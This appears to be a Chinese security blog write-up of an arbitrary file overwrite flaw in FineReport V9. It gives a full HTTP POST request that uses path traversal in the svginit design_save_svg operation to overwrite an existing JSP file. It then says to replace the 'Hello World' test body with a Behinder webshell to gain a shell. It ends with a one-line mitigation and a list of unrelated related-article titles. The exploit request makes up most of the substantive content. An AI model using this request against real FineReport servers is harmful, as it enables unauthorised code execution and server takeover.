0x00 任意文件上传漏洞【FineReport V9

0x01 漏洞描述

此漏洞是任意文件覆盖,上传 JSP 马,需要找已存在的 JSP 文件进行覆盖,寻找Tomcat 启动帆软后默认存在的 JSP 文件

0x02 漏洞详情

POST /WebReport/ReportServer?op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/update.jsp  HTTP/1.1
Host: x.x.x.x
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=DE7874FC92F0852C84D38935247D947F; JSESSIONID=A240C26B17628D871BB74B7601482FDE
Connection: close
Content-Type:text/xml;charset=UTF-8Content-Length: 74{"__CONTENT__":"<%out.println(\"Hello World!\");%>","__CHARSET__":"UTF-8"}

payload 替换成冰蝎的马,即可getshell

0x03  临时修复建议

排查是否使用帆软系统,并同步在AF自定义禁止访问webroot/ReportServer路径。

帆软 V9 Getshell 漏洞相关推荐

  1. 帆软数据决策系统漏洞_帆软报表漏洞总结

    一.帆软数据决策系统漏洞背景 FineReport报表软件是帆软软件(中国)公司自主研发的一款纯Java编写的企业级web报表软件.主要针对2012年7.0版本存在一些安全漏洞问题. 二.帆软数据决策 ...

  2. 帆软 FineReport 动态列如何设置

    最近有个需求是用采购的帆软报表来动态展示数据,记录下来,方便备查. 环境准备 帆软 FineReport V9.0 以用户信息统计表为例,具体操作步骤如下. 第一步.设置查询信息集 新建信息集 Dat ...

  3. PHPCMS v9 Getshell(Apache)

    公开时间: 2013-03-04 简要描述: phpcms v9 getshell (apache) 详细说明: 漏洞文件:phpcms\modules\attachment\attachments. ...

  4. 帆软参数设置_帆软报表(finereport)参数组合/下拉参数联动

    首先实现下拉参数联动 1.参数的定义→添加控件绑定数据→参数过滤和参数面板样式 下拉复选框控件注意事项: select * from table where 1=1 ${if(len(控件名称)=0, ...

  5. 帆软报表调用mysql存储过程_FineReport单行与数据库交互的方法

    FineReport单行与数据库交互的方法 1.   问题描述 我们在做一张报表填报的时候经常会遇到需要在一行进行添加动作,将该行数据直接与数据库交互,执行存储过程过程.我们可以通过每一行增加帆软&q ...

  6. Typecho反序列化导致前台 getshell 漏洞复现

    Typecho反序列化导致前台 getshell 漏洞复现 漏洞描述: Typecho是一款快速建博客的程序,外观简洁,应用广泛.这次的漏洞通过install.php安装程序页面的反序列化函数,造成了 ...

  7. 帆软finereport实现动态切换分组和列表模式

    首先简单说一下什么是帆软报表的"分组"还有"列表", 分组呢,就是这样: 列表呢,就是这样: 简单说,列表就是不合并重复的单元格了,分组就是自动把那些重复的单元 ...

  8. 使用帆软finereport实现跳转的一点心得

    最近单位在用帆软做快速开发,我虽然比较熟悉JavaScript和HTML,自己从零开始造轮子效果可能更好,但是毕竟局里想要使用这个,又是团队项目,自然是能省事就省事一点,有得用就用吧,年纪大了,我也就 ...

  9. gis 大屏_gis大屏可视化应用技术方案_gis大屏可视化应用技术_gis大屏可视化应用 - 帆软...

    如今大屏可视化的应用越来越普遍,在很多公共场合.交易大厅,以及企业的展览中心,大屏可视化都是非常震撼的.那么gis大屏可视化应用技术方案哪家公司靠谱?你需要掌握这2招选择标准. 一.gis大屏可视化应 ...

最新文章

  1. djc加密数字货币_中国银行原副行长: quot;网络加密币quot;难以成为货币,央行数字货币只能是法定货币的数字化...
  2. HDU-2476 String painter 区间DP
  3. 泛函分析——赋范线性空间定义的概念
  4. java假死_分析java进程假死
  5. linux下面拷贝pdf却没法在windows下面打开
  6. Ubuntu 设置下载路径
  7. JSONPath 解析 JSON 内容详解(翻译自 github)
  8. 风机桨叶故障诊断(三) 识别桨叶——初步构建BP神经网络
  9. 京东与中国石化全面深化战略合作 涉及能源供应服务等
  10. Oracle HTTP 乱码
  11. 纠错帖:Zuul Spring Cloud Gateway Linkerd性能对比
  12. SAP物料主数据随笔
  13. EM从最大似然到EM算法浅解
  14. oracle dblink 20001,解决ORA-02021: 不允许对远程数据库进行 DDL 操作下面通过DBLINK调用远程过程来执行这样的操作。...
  15. Atitit.线程 死锁 跑飞 的检测与自动解除 与手动解除死锁 java c# .net php javascript.
  16. CS231n Assignment1 Knn
  17. ICMP协议的作用是什么?
  18. c语言编程照抄能学好吗,电子信息类专业学生必看:一位老电子工程师十年感悟...
  19. 用go填写pdf模板
  20. GWT(Google Web Toolkit)是干嘛用的

热门文章

  1. 如何查询mysql中是否表被锁
  2. 植物表型的全球与中国市场2022-2028年:技术、参与者、趋势、市场规模及占有率研究报告
  3. 测试覆盖率统计工具_使用测试工具和方法进行测试覆盖率
  4. 双11史上作业数最多,人工干预最少的一次技术保障
  5. windows中安装spacevim
  6. java dijkstra算法 指定源宿_一种路径计算的方法和装置与流程
  7. Jenkins运行selenium自动化测试脚本
  8. 泰坦尼克号经典语录(一)
  9. C#中生成二维码(QR码)与读取二维码内容
  10. 笔记本清灰后组装后出现蓝屏,并不断的循环重启。